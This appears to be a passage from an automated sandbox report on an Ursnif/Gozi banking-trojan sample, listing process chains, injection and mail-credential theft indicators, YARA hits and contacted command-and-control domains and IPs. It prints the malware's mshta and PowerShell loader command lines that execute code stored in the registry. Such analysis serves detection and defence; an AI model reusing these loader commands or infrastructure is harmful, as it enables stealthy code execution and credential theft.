Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000020.00000002.723657372.0000000004F80000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000020.00000002.706975872.00000000008B8000.00000004.00000020.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F88B98 cpuid 0_2_00F88B98
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_10001B13
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0139B585
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001000
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F88B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00F88B98
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_1000166F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 343316 Sample: out.dll Startdate: 22/01/2021 Architecture: WINDOWS Score: 100 60 resolver1.opendns.com 2->60 84 Multi AV Scanner detection for domain / URL 2->84 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 10 other signatures 2->90 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 2->12         started        14 iexplore.exe 1 56 2->14         started        signatures3 process4 signatures5 92 Suspicious powershell command line found 9->92 16 powershell.exe 2 32 9->16         started        94 Detected Gozi e-Banking trojan 12->94 96 Writes to foreign memory regions 12->96 98 Allocates memory in foreign processes 12->98 100 4 other signatures 12->100 20 control.exe 12->20         started        22 iexplore.exe 30 14->22         started        25 iexplore.exe 30 14->25         started        27 iexplore.exe 30 14->27         started        process6 dnsIp7 52 C:\Users\user\AppData\Local\...\ntdrbunx.0.cs, UTF-8 16->52 dropped 54 C:\Users\user\AppData\...\f1lrerxf.cmdline, UTF-8 16->54 dropped 70 Injects code into the Windows Explorer (explorer.exe) 16->70 72 Writes to foreign memory regions 16->72 74 Modifies the context of a thread in another process (thread injection) 16->74 82 2 other signatures 16->82 29 explorer.exe 16->29 injected 33 csc.exe 3 16->33         started        36 csc.exe 16->36         started        38 conhost.exe 16->38         started        76 Changes memory attributes in foreign processes to executable or writable 20->76 78 Allocates memory in foreign processes 20->78 80 Maps a DLL or memory area into another process 20->80 40 rundll32.exe 20->40         started        62 api10.laptok.at 45.138.24.6, 49744, 49745, 49746 SPECTRAIPSpectraIPBVNL Turkey 22->62 file8 signatures9 process10 dnsIp11 64 c56.lepini.at 29->64 66 app.crasa.at 128.14.142.220, 49758, 80 ZNETUS United States 29->66 68 api3.lepini.at 29->68 102 Tries to steal Mail credentials (via file access) 29->102 104 Changes memory attributes in foreign processes to executable or writable 29->104 106 Writes to foreign memory regions 29->106 108 5 other signatures 29->108 42 RuntimeBroker.exe 29->42 injected 44 RuntimeBroker.exe 29->44 injected 46 cmd.exe 29->46         started        56 C:\Users\user\AppData\Local\...\f1lrerxf.dll, PE32 33->56 dropped 48 cvtres.exe 33->48         started        58 C:\Users\user\AppData\Local\...\ntdrbunx.dll, PE32 36->58 dropped 50 cvtres.exe 36->50         started        file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
128.14.142.220
 unknown United States
21859 ZNETUS false
45.138.24.6
 unknown Turkey
62068 SPECTRAIPSpectraIPBVNL true

Contacted Domains

Name IP Active
app.crasa.at 128.14.142.220 true
c56.lepini.at 45.138.24.6 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 45.138.24.6 true
api10.laptok.at 45.138.24.6 true